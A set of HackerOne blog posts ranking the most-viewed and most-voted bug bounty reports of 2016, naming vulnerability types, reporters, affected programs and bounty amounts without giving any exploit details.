Skip to main content

Top 5 Most Viewed Reports For Q2 2016

  • August 26th , 2016

Pidgey from Pokemon Go looking all mean on the street

In case you don’t have time to read three months of bug reports, here are the Top 5!

The Top 5 Most Viewed Bugs of the Second Quarter of 2016!

5. Reflected XSS on developer.uber.com via Angular template injection
This report earned $3,000 for albinowax. He included a link to this blog article (co-written by albinowax) that nicely explains how AngularJS can be used for a client-side template injection.

4. Unauthenticated access to Content Management System - www1.pornhubpremium.com
Mak and all the other hackers in this blog are HackerOne 90/90 Club members. That means they have a higher HackerOne Signal and Impact score than 90% of measured HackerOne hackers. This one earned $5,000.

3. Publicly exposed SVN repository, ht.pornhub.com
This was the most viewed report from Pornhub, who went public with their program on HackerOne shortly before this report was filed. Another one from Mak - nice job earning $10,000.

2. Local file read in image editor
Sl1m found this one and earned $5,000 from Imgur. And what a surprise, he is a member of the 90/90 Club.

1. OneLogin authentication bypass on WordPress sites
Uber has attracted the full attention of the best hackers on HackerOne, with $10,000 awards like this one. Jouko tied for the highest award among these five reports.

These two reports were actually in the Top 5, but were in last quarter’s blog so we exempted them from this list.

Public security disclosures make us all safer - they teach and inspire. Thank you to the hackers and companies that make them possible! Check out these instructions on how to share your reports on HackerOne.

Don't forget to upvote your favorite public disclosures in Hacktivity!

Rajesh F. Krishnan

Recent articles

The best security initiative you can take in 2017

As CEO of HackerOne, I am thrilled to confirm that, as part of our rapid growth, we have strengthened our…

Bug Bounties Help Keepsafe Secure The Data of 50 Million Consumers

Keepsafe is on a mission to help us keep our private lives as they should be - private. Bug bounties are a big…

Hack The Army Results Are In

The most ambitious Federal bug bounty program to date, Hack the Army, targeted operationally significant…

Top Vulnerability Reports of Third Quarter, 2016

  • October 28th , 2016

The Preferred State of Vulnerabilities

It’s time for the third installment of Top 5 Vulnerability Reports on HackerOne.

What a quarter! We sweated through the Vegas conferences, Hacked the World and held a jammed AMA on Reddit. Our hackers crossed the $10,000,000 mark of bounties earned. Best of all, our fantastic hackers helped companies find great vulnerabilities like the ones below.

Instead of listing the raw top five, we looked at the best five, non-repeat, non-summarized vulnerabilities of the quarter to share. Detailed vulnerabilities are the most instructive, so that’s why we highlight them here.

The Top 5 Vulnerability Reports of Third Quarter, 2016:

  1. Mongo investigated Uber passwords via their passwordless signup features. Uber fixed it in a day (Mongo confirmed it) and paid out $10,000. In Uber’s words, “Thanks for the great find @mongo!”. We’re very glad to have Mongo hacking for HackerOne.

  2. A frequent reporter in this blog series, orange knows how not to waste a trip. In this case to China, where a .cn domain of Uber’s was found to have a SQL Injection vulnerability when investigating an unsubscribe link closely. The report earned a nice $4,000.

  3. Paragonie-Scott is one of the most vocal security team leaders on HackerOne. Read his reaction to this oddball .svg report that reminds us that .svg is not like other image file formats. It allows arbitrary code execution by design. Abdullah received the largest-ever bounty from the Paragon program, not to mention over 3,500 pageviews and counting.

  4. We see lots of phrases like “This is probably not a big deal…” in initial hacker reports. Modest hackers! This report Subdomain takeover on http://fastly.sc-cdn.net/ began that way. Ebrietas started with an outdated DNS record and ended with a $3,000 bounty payment. Thanks for preventing users from potentially being served false content.

  5. Egypt’s secgeek reported Html Injection and Possible XSS in sms-be-vip.twitter.com to Twitter. The vulnerability, which affected the latest versions of Internet Explorer, could have allowed injection of html tags and Javascript execution. At HackerOne, we particularly like the professional, polite disagreement and resolution that came up along the way to a $420 reward. Nice find!

Do you see vulnerabilities you think were instructive or otherwise awesome? You can vote here to highlight the best on the top of the Hacktivity page.

Want to appear here next quarter? Hack on! Or invite your own hackers like the companies here did. As I once read, every organization needs a bug bounty program!

Rajesh F. Krishnan

Recent articles

The best security initiative you can take in 2017

As CEO of HackerOne, I am thrilled to confirm that, as part of our rapid growth, we have strengthened our…

Bug Bounties Help Keepsafe Secure The Data of 50 Million Consumers

Keepsafe is on a mission to help us keep our private lives as they should be - private. Bug bounties are a big…

Hack The Army Results Are In

The most ambitious Federal bug bounty program to date, Hack the Army, targeted operationally significant…

A Bountiful Year: Top Bugs and Hacktivity Highlights in 2016

  • January 12th , 2017

Hacktivity proudly showcases the achievements of our hackers and the community, culture, and collaboration we create through the act of hacking.

It was a wild ride for Hacktivity in 2016:

Let’s reflect on some of the major trends and patterns in our hacker community as seen through the eyes of Hacktivity.

Hacktivity's five most-voted vulnerabilities of the year

The top awards are not short on creativity, collaboration, and good ol' fashioned hard work. The highest-voted vulnerability report described how an attacker could exploit a vulnerable deserialization function in PHP leading to remote shell on a production server.

Most-voted Vulnerabilities of the Year

5. Internal attachments can be exported via “Export as .zip” feature

This report from japzdivino claims the highest payout from HackerOne's very own bug bounty program, not just in 2016 but of all time: $12,500.

4. Change any Uber user’s password through /rt/users/passwordless-signup - Account Takeover

Since their public launch not long ago, Uber has quickly climbed to be one of the most successful bug bounty programs and community favorites. They couldn’t have done it without amazing hackers, among which is the reporter of this great find, mongo.

What the HackerOne community accomplishes is truly a team effort, and this report exemplifies it perfectly: creative bug hunt, mind-blowingly fast response, competitive reward, happy hacker, and safer program.

3. Partial disclosure of report activity through new “Export as .zip” feature

Awarded at $10,000, this is the second highest payout from our bug bounty program. Rockstar Hacker Faisal Ahm reported within 24 hours of the feature release that contained this security flaw. And what’s more impressive? The issue was resolved within an hour of the report being filed (huge shoutout to our security team members!)

2. Oracle Webcenter Sites administrative and hi-privilege access available directly from the internet (/cs/Satellite)

LocalTapiola was considered a dark horse as compared to some of the 'usual suspects', but they proved themselves to be quite generous with critical issues found by sharp eyes, such as those of Teemu Kääriäinen. They're also the proud owners of the highest posted bounty award of $50K - perhaps we'll be hearing more from this program in the 2017 Hacktivity recap!

1. [phpobject in cookie] Remote shell/command execution

Pornhub's whooping $20,000 to static was eye-catching, but it’s part of a bigger trend of public programs not shy about paying more for well-deserved efforts and to attract top-ranked hackers. This is the story we’ll keep coming back to and tell to our friends around the proverbial campfire.

Hacktivity's five most-voted programs of the year

Not surprisingly, all of these programs are in the 90th percentile of what we deem as "Reward Competitiveness" with our Hacker Success Index Measurements. Basically, they incentivize hackers to hack their programs - and hack again and again because they’ll be rewarded for it!

Most-voted Programs of the Year

5. Shopify | https://hackerone.com/shopify
4. Twitter | https://hackerone.com/twitter
3. Pornhub | https://hackerone.com/pornhub
2. HackerOne | https://hackerone.com/security
1. Uber | https://hackerone.com/uber

Hacktivity's five most-voted hackers of the year

These hackers stood above the rest in 2016, boasting one of the most coveted things of all: recognition from their peers. Hail the top hackers!

Most-voted Hackers of the Year

5. japzdivino | https://hackerone.com/japzdivino
4. jobert | https://hackerone.com/jobert
3. static | https://hackerone.com/static
2. fransrosen | https://hackerone.com/fransrosen
1. bobrov | https://hackerone.com/bobrov

Looking Ahead

What a year it was, but 2017’s got a lot of great things in store! We would love to hear from you about what you’d like to see in Hacktivity. Feel free to send suggestions to feedback@hackerone.com.

Join us as we raise a glass to lots of Hacktivity in 2017!

Cheers,
Pei & Luke

PS: We also tabulated the top bugs based on payouts last year - A look at the top HackerOne bug bounties of 2016.

Recent articles

The best security initiative you can take in 2017

As CEO of HackerOne, I am thrilled to confirm that, as part of our rapid growth, we have strengthened our…

Bug Bounties Help Keepsafe Secure The Data of 50 Million Consumers

Keepsafe is on a mission to help us keep our private lives as they should be - private. Bug bounties are a big…

Hack The Army Results Are In

The most ambitious Federal bug bounty program to date, Hack the Army, targeted operationally significant…
Subscribe to hacktivity-highlights